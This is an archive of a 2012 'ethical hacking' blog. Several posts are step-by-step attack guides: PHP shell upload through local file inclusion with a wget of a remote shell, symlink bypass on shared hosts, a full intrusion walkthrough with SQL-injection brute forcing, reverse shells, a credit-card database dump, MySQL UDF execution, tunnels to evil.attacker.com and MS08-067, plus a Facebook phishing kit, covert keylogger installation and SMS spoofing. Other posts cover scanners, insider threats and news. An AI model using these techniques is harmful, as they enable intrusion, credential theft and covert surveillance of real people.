Ethical Hacking - Rafayhackingarticles

Local File Inclusion Vulnerability Demonstration - Shell Upload

2012-01-26T12:59:00.000-08:00

Local file inclusion is a very popular web application attack, It was very common few years back. However now a days you will rarely find websites vulnerable to this attack. However a single vulnerability can result in getting your website compromised. We have already written an article on Directory transversal attack. Therefore I believe that we need no to go in details about the attack. You might know avinash by now the author of the previous article How Hackers Are Hacking Into Websites On Shared Hosts. However in this article he will demonstrate a local file inclusion vulnerability and he will enhance the attack by uploading a shell on the website.

Here are some of the common parameters which are vulnerable to local file inclusion or remote file inclusion attacks.

index.php?homepage=
index.php?page=
index.php?index2=

Requirements:

1) A Vulnerable Website
2) Remote shell ( http://www.sh3ll.org/egy.txt )
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/ )
4) Mozilla Firefox

The first thing which a hacker will do while finding a LFI vulnerability is to locate the /etc/passwd file. This file indicates that a local file inclusion vulnerability is present in the website. The image below explains the whole story “root” is the username, followed by “x” which happens to be the password, however here it’s shadowed, which means that it’s present is /etc/shadow file. Which is only accessible when you have root privileges.

Next the hacker will check for /proc/self/environ. So change your path to /proc/self/environ/. The /proc/self/environ/ page should look something like this if the file exists, not all sites have it.

Once the local file inclusion vulnerability has been identified , the hacker will try to perform remote code execution and try to some how to further acesss. This can be done by uploading a PHP backdoor. For that purpose a commonly used tool is Useragent switcher. Which can be downloaded from the link above.

The hacker edits the useragent and changes code inside to the user agent to the following:

<?php phpinfo();?>

Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)

After refreshing the website, He then searches for the keyword "disable_functions" (Ctrl+F Search function)

disable_functions | no value | no value

The above function tells us that website is vulnerable to remote code execution and now we can upload the PHP backdoor. On the finding that the website is vulnerable he then tries to upload the shell by using the following command:

<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>

Where the above code uploads a PHP backdoor in a text form and later renames it to .php. Now the shell has been successfully uploaded. Once the PHP backdoor has been uploaded it will look like the following:

How To Be Protected?

We will cover it in our upcoming posts. If you are worried about your website's security and would like me to carry out a vulnerability assessment of your website. Feel free to contact me.

About the Author:

Avinash is a security researcher and a blogger. He runs a blog http://avisuni.blogspot.com, where he writes about hacking.

How to Make the Best Out Of A Vulnerability Scanner

2012-01-25T12:33:00.000-08:00

As your knowledge and experience in security increases, you start looking at a variety of security solutions that could help you do a better job and automate many of the processes. One of the first products that you would probably test is a vulnerability scanner. That’s an excellent first step but now comes the harder part, if you are new to vulnerability scanning, how do you go about making effective use of this solution?
Not all vulnerability scanners are the same and some of the functionality mentioned in this article may or may not be available to you; however I recommend that you go for a solution that gives you as wide a range of features as possible.

Inventory

Most good vulnerability scanners will keep an eye on the hardware and software deployed on your network. This is very valuable information. Run an inventory on your network to ensure that you are aware of everything that is installed and that it has been approved for use. Once completed set your vulnerability scanner to notify you of any changes from this baseline.

Scheduled scans

If your vulnerability scanner allows you to configure a periodic scan, create a schedule to scan your network daily. Select a time that least impacts your organization because a vulnerability scan can be slightly disruptive.

Port scanning

Malware can be stealthy and hide itself in several ways, therefore the more methods in use, the higher the rate of detection. Take note of any open ports each system has and look out for ports that should not be open and investigate further since this may indicate the presence of malware.

Patch management

A good vulnerability scanner will let you know what patches are missing on your system. Most will also allow you to deploy the patches. Before that, however, it is best practice to set up a testing environment that mirrors your live environment. This test network can be based on the inventory previously obtained using the vulnerability scanner. Test the missing patches on this test environment to ensure that they do not conflict with the current network setup – if all is well deploy them to the live environment.

Other vulnerabilities

Not all vulnerabilities can be addressed through patch management; some do not have patches available and others are configuration related. A good vulnerability scanner will point these out, give you information on such vulnerabilities and provide you with information on how to address them.

Security policies and software

A good vulnerability scanner will outline the security policies set on each of the scanned machines. It will also check if the antivirus software installed is up to date.
Monitoring these six basic items will ensure you have the necessary information to keep your network secure.

Always keep an eye on hardware and software changes and update the test environment accordingly. Carry out frequent scheduled scans, look out for open ports, and set notifications so that you are informed when a new port is opened. Regularly apply patches and fix any vulnerabilities that are detected as soon as possible.

This guest post was provided by Emmanuel Carabott on behalf of GFI Software Ltd. GFI is a leading software developer that provides a single source for network administrators to address their network security, content security and messaging need. Learn more on what to look out for when choosing a vulnerability scanner.

How Hackers Are Hacking Into Websites On Shared Hosts - Symlink Bypass Explained

2012-01-24T13:43:00.000-08:00

You might have noticed a tremendous increase number of hack attacks on wordpress, joomla blogs and other content managing systems. What the hackers are doing is that instead of targeting the CMS itself meaning wordpress or joomla. They are targeting a vulnerable website on a server, Once they gain access to a single vulnerable website on the server, They upload a shell and with a method called "Symlink Bypass". They manage to extract the configuration files of another website hosted on that same server and later on using a simple MySQL interface they connect to that website.

Avinash, a security student and researchers will explain step by step how hackers hack into websites on shared host with the method called Symlink bypassing.

What Is Symlink Bypass?

Well, I would not like to go into much detail. However for your understanding all you need to know is that symlink is a method to refrence other files and folders on linux. Just like a shortcut in windows. Symlink is necessary in order to make linux work faster. However symlink bypassing is a method which is used to access folders on a server which the user isn't permitted. For example the home directory can only be accessed by a root level user. However with symlink bypass you can touch files inside home directory.

Step 1 - The hackers searches for a vunerable website on a server. A hacker can get list of domains on a webserver by doing a reverse iP lookup.

Step 2 - Next the hacker hacks into any vulnerable website on the server and upload a PHP shell.

Step 3 - The above picture demonstrates two files one named .htacess and the second named jaugar.izri being uploaded to the server. Here is what Jaugar.izri looks like when it's made public by adding 0755 permissions.

Step 4 - The hacker connects to the izri script and then gives the following commands

mkdir 1111
cd 1111
ln -s / root
ls -la /etc/valiases/(site.com)

The first command creates a directory named 1111(Mkdir 1111). The next command navigates to the directory(cd 1111). The third command creates the symlink of the root. The fourth command will extract the user name of the website you put in place of site.com.

The target website is entered in ls - la /etc/valiases/site.com.

The above screenshot explains the whole story. The hacker then navigates to the "1111" directory and the configuration file of the target website is created there. The hacker downloads the configuration files and uses the information to access the database and there he can make any changes.

How To Be Protected?

There is nothing much you can do it on your end, else then renaming your config and moving it to a safer place. If you are worried about your website's security, Feel free to contact me.

About The Author:

Avinash is a security researcher and a blogger. He runs a blog http://avisuni.blogspot.com, where her writes about hacking. He promises to be a regular contributer here at RHA and RHA welcomes talent.

January 2012 Contest Sponsor For RHA - PentestMag

2012-01-24T01:22:00.002-08:00

Due to a tremendous response of readers and huge number of participants of the last contest ElearnSecurity, we decided to setup another contest for RHA readers. We have partnered with pentestmag.com and arranged a contest for our readers, The winners will be handed over with prizes worth up to 1400$.

PenTest Magazine is a weekly downloadable IT security mag, devoted exclusively to penetration testing. It features articles by penetration testing specialists and enthusiasts, experts in vulnerability assessment and management. We cover all aspects of pen testing, from theory to practice, from methodologies and standards to tools and real-life solutions. Each magazine features a cover focus, and articles from our regular contributors, covering IT security news and up-to-date topics.

[1ST PRIZE]1 Year Full Subscription Of Magazines[Worth 180$]

The winner will get full one year access to the amazing pentest magazine.

[2ND PRIZE]"Analyzing Computer Security" by Charles P. Pfleeger and Shari Lawrence Pfleeger.[Worth 110$]

Analyzing Computer Security is a fresh, modern, and relevant introduction to computer security. Organized around today’s key attacks, vulnerabilities, and countermeasures, it helps you think critically and creatively about computer security–so you can prevent serious problems and mitigate those that still occur.

[3RD PRIZE] 10 Winners For 2 Months Of Subscription [Worth 200$]

10 random winners will get 2 months of access to the magazine.

How To Participate

1. First of all you need to register for a free account onhttp://pentestmag.com/wp-login.php?action=register

2. Next you need to share this contest page with your friends on Facebook, Twitter, Digg, Delicious, yahoo groups, facebook groups, like page etc.

3. Lastly you would need to post a comment telling us briefly "Why Do You think, you Should Be Choosen As A Winner?"

How To Win?

[First Prize] The person with the most number of shares and the most impressive answer to the above question will win the first prize of penetration testing pro course.

[Second Prize] The person with the second most number of shares and an impressive answer to the question will win

Note: The answer carries more weight than your shares, which means that if you have the most shares and not a very impressive answer, You may move to the second and third position.

[Third Prize]The third prize will be chosen via a lucky draw,

Here is an example:

Hello my name is "ABC", My email address is abc@gmail.com, I have liked your page and have shared this post on following places:

My Facebook Profile : http://facebook.com/risepk
My FanPage Profile with 1,437 fans : http://facebook.com/risepks
My Google + Profile : http://gplus.to/risepk
My Tumblr BLog : http://risepk.tumblr.com
My Twitter Profile having 557 followers : http://twitter.com/risepk
My Linked in Profile : http://pk.linkedin.com/in/risepk
My Stumble Profile : http://www.stumbleupon.com/stumbler/risepk/all/
My Digg Profile : http://digg.com/faizmuhammadkhan
My Delicious profile : http://www.delicious.com/risepk

I would like to be choosen as a winner because <Your messsage>.

When will the winners be announced?

The winners will probably announced in the first week of Feb. We wish you best of luck.

How To Deal With Insider Threats?

2012-01-23T12:43:00.000-08:00

The biggest threats to IT security don’t originate from outside a company. Employees, contractors, and business partners on the inside pose a far greater security risk. As long as your current or former staff and associates have access to your internal network, you are vulnerable to a security breach.

Here’s how to deal with the real and significant threat of attack from insiders, and avoid the widespread damage they can unleash on your company’s finances and reputation.

First: Assess the Risk

For most firms, implementing full protection against every possible threat is not feasible. It makes more sense to assess the risk, determining which data is critical and which is relatively unimportant. Protect critical resources first.

Next, decide who needs access to the network. Make sure that individuals such as partners, suppliers and contractors have access only to the information they need to serve your company or customers.

The third step in assessing risk is determining who are the potential threats, why they would want access to the network, and how they could gain entry. At this stage, many organizations only consider external threats: competitors, random hackers or former employees. Don’t neglect analyzing your insider threats, as well – including the staffers tasked with protecting the system.

Once you’ve uncovered vulnerabilities, you can take steps to prevent an insider attack.

Implement Preventative Measures

Among the best practices for preventing insider threats are:

Institute clear policies and controls; be sure all employees are aware of acceptable network use and what constitutes a breach.
Enforce policies consistently; maintain proper paper trails.
Implement security awareness training; reinforce its importance.
Segregate duties to reduce risk.
Encourage employees to come forward and identify suspicious behavior, malicious insiders, threats against the company or attempts at exploitation.
Implement proper system administration safeguards on critical servers.
Monitor trusted users.
Audit access to customer information.

In addition, you’ll want all the usual technical protection against spyware, malware and viruses, firewalls, and regular security patches. Consider securing the physical space as well, with entry and exit controls and badges to monitor employees, delivery people and visitors. You want to hire security personnel to discourage criminal activity.

Finally, Know Whom You’re Hiring

Failing to thoroughly check out a potential hire leaves a company vulnerable to insider threats. It goes without saying that thorough background checks are necessary for any prospective new employee who will have access to sensitive information, from customer credit card numbers to crucial application source codes. But for better protection, extend that practice to all employees and contractors.

Background checks should include a criminal history report, a credentials check and a credit check. Hiring managers should verify past employment and speak to former employers regarding the applicant’s history of dealing with workplace issues. Any information gathered should be part of the decision-making process.

Monitor Employee Behavior

Once an employee is hired, be sure supervisors are tasked with reporting any strange or inappropriate behavior. Compare such incidents to systems logs to determine if anything unusual is happening. And remember to enforce all security policies. If employees learn they can get away with small violations, they may be emboldened to move on to bigger and more lucrative security breaches.

Be Aware and Vigilant When Dealing With Insider Threats

Whether they modify data, steal critical codes, sell company secrets or commit payroll fraud, insiders are the biggest security threats a company will face. While there is always an element of risk, you can decrease information system vulnerability with these common sense steps. Most importantly, by being aware and vigilant, you’ll be better prepared to avoid the losses that far too many organizations suffer at the hands of trusted insiders.

As more companies move more of their businesses online we should expect to see more threats. Formal IT security training can help defend against these threats. Consider Villanova University’s online programs such as their CISSP certification prep courses

FBI Shudowns Megaupload.com, Anonymous Shutdowns FBI

2012-01-21T15:37:00.000-08:00

Megaupload.com was shut down by FBI on Thursday.

A day after a 24-hour blackout of popular Websites such as Wikipedia, Reddit and BoingBoing, which were protesting a pair of controversial anti-piracy bills(SOPA/PIPA) making their way through Congress, FBI stepped in and shut down one of the world's largest file-sharing sites Megaupload.com, also charged four people connected to it in New Zealand and seized Millions in cash from the authorities. However three of the higher authorities are on the run and thought not to be in New Zealand.

Kim Dotcom former CEO of Megaupload.com was Captured by FBI

Online piracy by the two companies - Megaupload Ltd and Vestor Ltd - made more than $ 175 million in criminal proceeds and caused more than half a billion dollars in harm to copyright owners

Banner on Megaupload.com after taken down by FBI.

However, after megaupload was shuttered by FBI, Anonymous - a group of hackers retaliated by taking down DOJ and many White House websites. Fbi.gov was also taken down but was recovered lately. The hacking group released a document on file-sharing site Pastebin.com listing the websites they planned to attack along with the names of US Democratic Party leaders and MPAA employees and their families.

The details included property values, work and home phone numbers and addresses as well as the names, ages and schools of the member's children.


A screen shot of the dossier of MPAA and US Democratic Party members and their families compiled and published by Anonymous.

The document posted on postbin.com also said 'We Anonymous are launching our largest attack ever on government and music industry sites. Lulz. 'The FBI didn't think they would get away with this did they? They should have expected us.'

"Megaupload was taken down w/out SOPA being law. Now imagine what will happen if it passes. The Internet as we know it will end. FIGHT BACK," wrote @YourAnonNews on Twitter in a reference to the ongoing battle in Congress over the controversial Stop Online Piracy Act (SOPA).

This attack is thought to be the largest ever with 5000+ people involved in bringing down the government and entertainment industry websites.

Megaupload was unique not only because of the size and amount of contents, but also because of the high level of support from celebrities, musicians and other content producers that are the most common victims of copyright infringement and piracy.

For many users, the shutdown had nothing to do with piracy and everything to do with the fact that their backups and data were now gone.

If convicted each individual could be jailed for up to 20 years on the charges of five counts of racketeering, copyright infringement and conspiracy.

Penetration Testing in the Real World By Offensive Security

2012-01-21T11:37:00.000-08:00

Why browsing on the internet, I found an excellent video regarding penetration testing in real world by offensive security. Penetration testing in the real world is really difficult from what you do inside testing environments like webgoat, DVWA tools etc. There are lots of security mechanisms being implemented now a days like IDS, IPS, firewalls etc. Therefore Penetration testing in the real world has became quite difficult. In the following video the instructor explains penetration testing in real world. He goes right away from exploiting the Filetransfer protocol right up to gaining administrator access to the machine.

Penetration Testing in the Real World from Offensive Security on Vimeo.

ftp-brute.py

#!/usr/bin/pythonfrom ftplib import FTPprint "Attempting user Directory Discover via FTP"for i in range(0,6):username=%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT "+ STR(I)+",1; -- "password=str("1")ftp=FTP('www.offseclabs.com')ftp.login(username,password)print "Logged in as user "+str(i)+",1"ftp.retrlines('LIST')ftp.close()

Open Terminal A :

nmap -p 21,80 www.offseclabs.com
nc -v www.offseclabs.com 80
HEAD / HTTP/1.0
(To enumerate the webserver)
clear
ftp www.offseclabs.com
username - bob
password - bob
(To enumerate the ftp server)
ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --
password - 1
(logged in to the ftp server)
pwd
ls
bye
clear
cd core
clear
nano brute.py --> (see above ftp-brute.py)
./brute.py
(get the fifth user who has mapped to the root directory of webserver)
clear

ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --
password - 1
(logged in as the fifth user)
ls
put rs.php --> (a reverse php shell) Download reverse PHP shell

-----------------------

Open Terminal B :

nc -lvp 80
-----------------------
Open Terminal C :
wget www.offseclabs.com/rs.php
(Then, at Terminal B, we got a reverse shell)
-----------------------
Go back to Terminal B :
(inside the reverse shell)
/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(get the MySQL username and password as well as MySQL server address and database name)
mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt
------------------------

Open a Firefox :
www.offseclabs.com/images/ccdump.txt
(we got the database dump)
-------------------------

Go back to Terminal A :
(inside the ftp server)
put up.html --> (file upload html file)
put up.php -- > (file upload php file)
-------------------------

Open Firefox :
www.offseclabs.com/up.html
(upload lib_mysqludf_sys.so and marked it as 1)
(upload rs [a binary reverse shell) and marked it as 2)
** Details of lib_mysqludf_sys.so
---------------------------
Go back to Terminal A :
(quit the ftp server)
bye
clear
exit
(quit Terminal A)
----------------------------

Go back to Terminal B :

mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(login to MySQL server)
use pwn;
SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';
SELECT imgdata from binfile where title="2" into dumpfile '/tmp/db';
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
SELECT sys_eval('chmod 755 /tmp/bd');
SELECT sys_eval('/tmp/bd &');
(don't press Enter at this moment)

---------------------------
Open Terminal D :
nc -lvp 80
(go back to Terminal B and press enter, you will get reserver shell at Terminal D)

----------------------------
Open Terminal E :
nc -lvp 80
----------------------------

Go back to Terminal B :
(inside the MySQL server)
SELECT sys_eval('/tmp/bd &');
(press enter and we got another reverse shell at Terminal E)

---------------------------
Go back to Terminal E :
(inside the reverse shell)
ping -c 1 10.150.0.20
clear
ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(create a remote tunnel at port 445)
-----------------------------

Open Terminal F :
netstat antp
nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse

-----------------------------

Go back to Terminal D :
ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(create a remote tunnel at port 4444)
clear
------------------------------
Go back to Terminal F :
cd core
nano nx.py --> (a ms08-067 python exploit for win2k3 sp2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444
(we got a remote shell of 10.150.0.20)
ip config
net user hacker hacker /add
net localgroup administrators hacker /add

---------------------------------
Go back to Terminal D :
(quit the tunnel)
exit
clear
ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel on port 3389)
clear
-----------------------------------

Open Terminal G :
netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1
(login to the 10.150.0.20 with username - hacker and password - hacker)

Credits - ehacking.net for commands.

Hack Facebook Account Status - Facebook Status Vulnerability

2012-01-20T08:23:00.000-08:00

We have already disscussed alot about "How To Hack Facebook Passwords" in my article Top 10 Ways How Hackers Can Hack Facebook Accounts In 2011. However in this article I will talk about a common vulnerablility which can be used by hackers to hack a facebook account status. Before I proceed with this article I would like to mention it clearly that every thing explained here is for educational purposes only. Our mission is not to encourage people to hack facebook accounts, However we want to raise awareness among people regarding latest internet security threats.

Facebook Account Status Hack - Methodology

There are tons of Facebook users who use a feature called facebook text in order to update a facebook status. If you have enabled this feature all you need to do in order to update your status is to type in your status and send it to "923223265".

However the idea behind this facebook Account status hack is to send a fake sms from your friend's number, therefore the facebook will think that the message has came from the legitimate source and hence it will update the victims Status.

SMS Global

SMSGlobal is a website that allows you send fake sms, The free account only allows you to send 25 SMS, However the business account allows you to send more. All you need to do is to register on SMS global, activate your account. After logging in to your account, click on “Send SMS to a Number”.

Send SMS To: 923223265 (Facebook)

Sender ID From: Victims Mobile Number.

Message: The Status which you would like to be updated.

CounterMeasures

Turn off facebook mobile updating feature.

Hope you have liked the post! If you have any questions regarding this article, feel free to ask.

Wordpress Plugin Easy Comment Uploads Vulnerability - Thousands Of Websites Vulnerable

2012-01-19T14:31:00.000-08:00

Wordpress as you might know is one of the most widely used blogging platforms, As a reason of which it has became the favorite target of hackers. Wordpress itself is quite secure, however the plugins make it unsecure resulting in hack attacks, data loss etc, when they are created the developers do not think of the security or do not know how to write the secure code, hence skipping lots of necessary checks making the plugins vulnerable to attacks like SQLInjetion, Remote File inclusion etc.

One of those popular vulnerable plugin is Easy Comment Upload plugin, The version 0.61 and prior versions are affected with Arbitrary File Upload Vulnerability. The plugin fails to check the upload file type as a reason of which it can be exploited by uploading a Phtml file.

There are thousands of wordpress blogs still vulnerable to this attack. The vulnerability can be fixed by updating the wordpress easy comments plugin to version 0.71.

If you want to know more about Protecting your wordpress blog from hackers you can refer the following posts, If you still think your blog is vulnerable drop me an email and I will perform a security assessment on your blog.

Which Programming To Learn For Hacking?

2012-01-18T07:01:00.000-08:00

Having the prior knowledge of programming is something which will separate you from all the other script kiddes( Wanna be hackers) and other tool lovers out there, Lots of times during penetration tests you come across a point where you need to write or build your own custom scripts and programs this is where the knowledge of programming comes handy.

The other and by the far the most important advantage of programming is that you will be able to understand exploit codes and even learn to write them too, Though there are softwares which have made the process of exploit writing much simpler, but you still need to have a solid grasp of programming languages in order to know how the exploits work.

Now that you have understood the importance of learning programming languages, You might be asking yourself “where to began”, “Which programming language” should I began learning with, Don’t worry, I have seen these types of questions asked a lot in various hacking communities and forums, The answer to these questions is that it depends on your interest.

Web Hacking

Now if you are interested in webhacking subject, subject then I would recommend you to learn the following languages:

1. HTML – Start with Html if you don’t know it

2. Javascript – Next learn javascript, which will help you understanding the fundamentals of cross site scripting which will be explained later in this book.

3. SQL Databases – You should learn to work with databases, which will help you to understand the fundamentals of SQL Injection attacks which will be also explained later in this book when we come to the Web Application hacking chapter.

4. PHP – Learning PHP should be your one of your first priorities if you want to understand the mechanisms behind the web hacking attacks. I would recommend you to learn it as soon as possible.

Recommended Sources:

5. W3schools – W3schools has wide variety of e-learning courses including languages like PHP, HTML, Javascripts etc, If you have zero knowledge of programming languages try starting with HTML and javascript.

Exploit Writing

Exploit writing is a very difficult segment in hacking as it requires pure programming knowledge, which is why I will not recommend you to start with exploit writing, Exploits are/can be coded in almost any programming language e.g C/C++, Python, Perl etc, but more than 50% of the exploits you will find on the web will be coded in C/C++ languages because they were present before any one of other languages. Languages such as C and C++ are considered as programming languages where as languages such as ruby, perl and python are considered more as scripting languages.

I would recommend you to start with C languages and then to C++, C/C++ have lots of similarities, so if you could get a good grasp on any one of them you can learn the other one easily.

Ruby

Talking about scripting languages, I would recommend you to start with Ruby, Ruby is one of my most favorite programming language as it’s purely objected oriented which means that everything you work on is an object. Ruby is really useful when it comes to exploit writing, Ruby is used for coding meterpreter scripts and what could be more better that the Metasploit framework itself was coded in ruby language.

Python

Python is also a very useful programming language, it can also be used for exploit writing, If you go for python first then make sure that you learn Python socket programming as it will help you a lot in the exploit creation process.

PERL

Talking about PERL, it’s also used widely for exploit writing, you will find lots of exploits out there written in PERL, but the problem is that perl is really difficult compared to other languages such as ruby and python, so I would recommend you to learn it at the very end.

Reverse Engineering

Reverse engineering is an act of tampering softwares, applications to make them work out way, If you are interested in reverse engineering and software cracking stuffs then you would surely need to learn Assembly language.

Reverse Engineering Tutorials:

If you are serious about learning to code in assembly then I would recommend you to read jeff Duterman’s “Assembly Language Step-by-step” book.

This concludes our chapter “Hacking And Programming”, One thing I would like to point out that learning 10 different programming languages is not a big deal but mastering a one is surely very difficult, Consider picking up a programming language to learn and make sure that you keep practicing it.

How to hack facebook password

2012-01-15T13:05:00.002-08:00

Are you curious to "hack facebook password" well then this post is just for you, Most people ask me to tell them the easiest way to hack facebook password, so here are some ways to that hackers take to hack facebook password:

1.Facebook phishing
2.Keylogging
3.Facebook new features
4.virus
See my article on 4 ways on how to hack a facebook password for information on the above methods
But today we will focus on a method which has a high success rate celled Phishing and keylogging,so first of all:

What is phishing?

Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. However phishing requires specialized knowledge and high level skills to implement. So I recommend the use of Phishing to hack facebook account since it is the easiest one.

Phishing Procedure:

First of all download Facebook fake login page
(Complete the survey to unlock Facebook fake login page)

1.once you have downloded facebook fake login page now extract contents in a folder

2.Now open pass.php and find (CTRL+F) 'http://rafayhackingarticles.blogspot.com' then change it to your to is the 'http://www.google.com.pk'

Note:'http://www.google.com' is the redirection url,When victim will enter his/her email and password he will redirected to'http://www.google.com' instead of "http://rafayhackingarticles.blogspot.com"

Now Save it .

3.Now open facebook fake page in a wordpad

4.Now in the fake page press Ctrl+F and search for the term "action=" now change its value to pass.php i.e. action=pass.php

5.Create an id in www.110mb.com,www.ripway.com or t35.com.

Note:Lots of people have complaint that they get banned from 110mb.com.ripway.com and t35.com so as an alternative you can use ooowebhost.

6.Then upload all the files Facebook.htm,Pass.php in 110mb directory or an other and just test it by going to http://yoursite.110mb.com/Facebook.htm for the fake login page.Just type some info into the text box and then you will see in your file manager that a file called "Facebook.txt" is created, In which the password is stored

7.Go to http://yoursite.110mb.com/Facebookpassword.htm for the stored passwords !

How it works?

When a user types a Username Password in the the text box,The info is sent to "login.php" which acts as a password logger and redirects the page to "LoginFrame2.htm" which shows "There has been a temporary error Please Try Again" in it .So when the person clicks on try again it redirects to the actual URL so that the victim does not know that yoursite is a fake site and gets his Facebook.com password hacked

Keylogging - Easy way:

The easiest way and best way to hack Facebook is by using a keylogger(Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers,below i will show you on How to hack facebook passwords with winspy and sniperspy

1. Sniper Spy (Remote Install Supported)

SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.
Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!
Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel!
This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands.

Click here to read the review of sniperspy

2.Winspy Keylogger

First of all free download Winspy keylogger software from link given below:

Download Winspy Keylogger

2. After downloading winspy keylogger to hack Facebook account password, run the application. On running, a dialog box will be prompted. Now, create an user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.

3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.

4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.

5. Now, Winspy’s main screen will be displayed as shown in image below:

6. Select Remote at top, then Remote install.

7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.

.user - type in the victim’s name
.file name - Name the file to be sent. Use the name such that victim will love to accept it.
.file icon - keep it the same
.picture - select the picture you want to apply to the keylogger.
In the textfield of “Email keylog to”, enter your email address. Hotmail accounts do not accept keylog files, so use another emailaccount id,my sugession is using a Gmail id
Thats it. This much is enough. If you want, can change other settings also.

8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Facebook account password.

See more about best keyloggers available:
Which spyware keylogger software to choose

If you are a Beginner and are interested in learn Hacking from beginning I recommend you reading my book on Ethical hacking "A beginners Guide To Ethical hacking"

Subscribe to our blog and get Facebook Hacking updates,To subscribe click on the button below,dont forgot to click the activation link in your email box

Winners Announced - December 2011 Contest

2012-01-08T09:28:00.000-08:00

It's finally time to announce winners for My "elearnSecurity Penetration testing course", First of all I would like to thank all the people who participated in the contest, Secondly I would like to inform you that the winners were not picked by me, They were picked by elearnsecurity team. We also received some private entries from people who were not interested in revealing their email addresses through the comments section.

Here were the rules of the contest:

[First Prize] The person with the most number of shares and the most impressive answer to the above question will win the first prize of penetration testing pro course.

[Second Prize] The person with the second most number of shares and an impressive answer to the question will win

Note: The answer carries more weight than your shares, which means that if you have the most shares and not a very impressive answer, You may move to the second and third position.

[Third Prize]The third prize will be chosen via a lucky draw

A Note from Armando (CEO OF eLearnSecurity:)

Hello, it's Armando from eLearnSecurity.
First let me say it has been HARD to select a winner for this contest. Many of you contributed a lot: we are blushing for your interest in our course but we had to pick 3 anyway.

We selected based on the number of shares AND the comment/reasons to be enrolled on the course.

The third place was selected based on the comment and we liked the idea to let a student in the course. We support students, especially those who cannot afford to pay for the whole tuition fee.

Life is not just about how many friends (followers?) you have who can help you reach your goal :) Hope you understand my point.

Thanks all for your support of this initiative

Winners

Here are the winners for the contest:

Danial
Minhal Mehdi
Sumeet Kumar

Winners are advised to leave their emails. So we can send them the courses.

So guys, take some time to congratulate contest Winners. If you're one of them, hearty congratulations to you. If you're not one of them, don't worry, there are many more contests to come

Facebook Hacked: A Worm Steals More Than 45k Passwords

2012-01-07T02:02:00.000-08:00

Facebook as you might know has been a victim of malware attacks and hoaxes for a large span of time now, It seems that facebook has been unsuccessful to stop these kind of attacks. A famous worm called Ramnit worm has been actively found in the facebook environment. It is reported by Symantec that this worm is responsible for the theft of more than 45k passwords.

According to Cyberthreat management site Seculert, most of the stolen credentials were from US, UK and France, Furthermore they have added that over the of these stolen logins were invalid and many of them have reacted correctly by changing their username and passwords.

Bypass two-factor authentication and transaction signing systems, gain remote access to financial institutions, compromise online banking sessions and penetrate several corporate networks

"Recently, our research lab identified a completely new 'financial' Ramnit variant aimed at stealing Facebook login credentials. Since the Ramnit Facebook C&C URL is visible and accessible it was fairly straightforward to detect that over 45,000 Facebook login credentials have been stolen worldwide, mostly from users in the United Kingdom and France"

Countermeasures:

1. Avoid clicking on any kind of suspicious links.
2. Update your Antivirus Right away.

Hashing Denial-Of-Service Attack Leaves More Than Half Of The Internet Vulnerable

2011-12-31T01:37:00.000-08:00

A recent research Alexander “alech” Klink and Julian “zeri” Wälde shows that more than half of Internet is vulnerable to Hashing Denial of service vulnerability. The HDOS vulnerability exploits the hash tables consuming more than 99% of the CPU usage hence causing a Denial of service attack.

The security researchers demonstrated the HDOS vulnerability at 28th Chaos Communication Congress security conference in Berlin, Germany, Earth, Milky Way. The talk was titled as "Efficient Denial of Service Attacks on Web Application Platforms". The reaserch shows that most of the web programming languages including PHP, ASP.NET, Java, Python, Ruby, Apache Tomcat (The list goes on and on) are vulnerable to the HDOS vulnerability

PHP 5, Java, ASP.NET as well as V8 are fully vulnerable to this issue and PHP 4, Python and Ruby are partially vulnerable, depending on version or whether the server running the code is a 32-bit or 64-bit machine.

